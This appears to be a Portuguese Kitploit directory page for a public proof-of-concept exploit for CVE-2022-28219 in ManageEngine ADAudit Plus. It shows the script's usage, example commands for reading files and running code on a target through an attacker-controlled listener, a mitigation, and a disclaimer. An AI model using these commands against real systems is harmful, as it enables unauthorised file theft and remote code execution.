Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-28219 — PoC para ManageEngine ADAudit Plus CVE-2022-28219 | Kitploit
Ferramentas/GitHubGitHub/horizon3ai/cve-2022-28219
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed TeamingFerramenta de Acesso Remoto
GitHubhorizon3ai/cve-2022-28219

CVE-2022-28219

PoC para ManageEngine ADAudit Plus CVE-2022-28219

Ver Repositório
4315há 4 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-28219

PoC para o CVE-2022-28219 que afeta o ManageEngine ADAudit Plus em builds anteriores à 7060

Análise Técnica

Mais detalhes em nosso blog: https://www.horizon3.ai/red-team-blog-cve-2022-28219

Uso

root@kitploit:~
% python3 CVE-2022-28219.py -h
usage: CVE-2022-28219.py [-h] -t TARGET -l LHOST -d DOMAIN [-lhp HTTP_PORT] [-lfp FTP_PORT] [-f FILE] [-c COMMAND] [-u USER]

optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        target URL with port
  -l LHOST, --lhost LHOST
                        local bind IP
  -d DOMAIN, --domain DOMAIN
                        fully qualified domain served by ADAudit Plus
  -lhp HTTP_PORT, --http-port HTTP_PORT
                        local HTTP port to bind to
  -lfp FTP_PORT, --ftp-port FTP_PORT
                        local FTP port to bind to
  -f FILE, --file FILE  get file or directory listing at given path, use forward slashes and don't include drive, e.g. /windows/win.ini or /users
  -c COMMAND, --command COMMAND
                        command to execute, e.g. calc.exe
  -u USER, --user USER  user running ADAudit Plus app, useful for finding upload file quickly

Por exemplo, para obter o arquivo c:\windows\win.ini:

python3 CVE-2022-28219.py -t <target_url> -l <attacker_ip> -d <target_fqdn> -f /windows/win.ini

Ou para executar calc.exe no alvo:

python3 CVE-2022-28219.py -t <target_url> -l <attacker_ip> -d <target_fqdn> -c calc.exe

Observe que a recuperação de arquivos e a RCE exigem que o ManageEngine ADAudit Plus esteja sendo executado no Java runtime 8u121 ou anterior. Isso será verdade na maioria das vezes, pois a versão padrão do Java runtime incluída com o ADAudit Plus é a 8u051.

Mitigação

Atualize para o ManageEngine ADAudit Plus build 7060 ou posterior.

Siga a equipe de ataque da Horizon3.ai no Twitter para as pesquisas de segurança mais recentes:

  • Horizon3 Attack Team
  • James Horseman
  • Zach Hanley

Aviso Legal

Este software foi criado puramente para fins de pesquisa acadêmica e para o desenvolvimento de técnicas defensivas eficazes, e não se destina a ser usado para atacar sistemas, exceto quando explicitamente autorizado. Os mantenedores do projeto não são responsáveis pelo uso indevido do software. Use com responsabilidade.

Baixar ferramenta